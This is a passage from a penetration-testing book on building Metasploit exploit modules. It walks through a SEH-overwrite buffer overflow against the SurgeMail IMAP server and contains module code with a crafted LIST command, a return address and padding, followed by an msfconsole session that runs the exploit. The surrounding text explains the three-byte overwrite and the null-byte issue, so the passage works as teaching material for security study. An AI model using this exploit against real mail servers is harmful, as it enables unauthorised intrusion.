background image

Creating Your Own Exploits

207

'Platform'       => 'win',

            'Targets'        =>
                [

[ 'Windows Universal', { 'Ret' => 

"\x7e\x51\x78"

 } ], # p/p/r in surgemail.exe

                ],
            'DisclosureDate' => 'March 13 2008',
            'DefaultTarget' => 0))
    end

    def exploit
        connected = connect_login
        lead = "\x41" * 10360

evil = lead + 

[target.ret].pack("A3")

        print_status("Sending payload")
        sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"

To perform a three-byte overwrite of the SEH, we set the three bytes to be 

added to the buffer in the 

'Targets'

 block at  , in little-endian order, as shown 

in boldface type in the listing. (Endian-ness is determined by the target CPU’s 
architecture, and Intel-compatible processors use little-endian byte ordering.)

At   we replace the three 

C

s in the 

evil

 string with 

[target.ret].pack("A3")

which will send the return address exactly as it is declared in the 

'Targets'

 

block. When modifying many exploits that use a three-byte overwrite, you can 
declare the target address literally (

0x0078517e

 in this case) and Metasploit 

will automatically order the bytes correctly when you use 

[target.ret].pack('V')

This scenario requires more granular control, because if we were to send the 
null (00) byte, it would represent the end of a string and could prevent the 
exploit from functioning properly.

Now is a good time to run the exploit to make sure that it works prop-

erly. If you jump too far ahead when developing an exploit, you run the risk 
of making an error somewhere and having to do a lot of backtracking to find 
out what went wrong. Here’s the exploit:

msf > 

use exploit/windows/imap/surgemail_book

msf exploit(surgemail_book) > 

set IMAPPASS test

IMAPPASS => test
msf exploit(surgemail_book) > 

set IMAPUSER test

IMAPUSER => test
msf exploit(surgemail_book) > 

set RHOST 192.168.1.155

RHOST => 192.168.1.155

 msf exploit(surgemail_book) > 

set PAYLOAD generic/debug_trap

PAYLOAD => generic/debug_trap
msf exploit(surgemail_book) > 

exploit

[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) >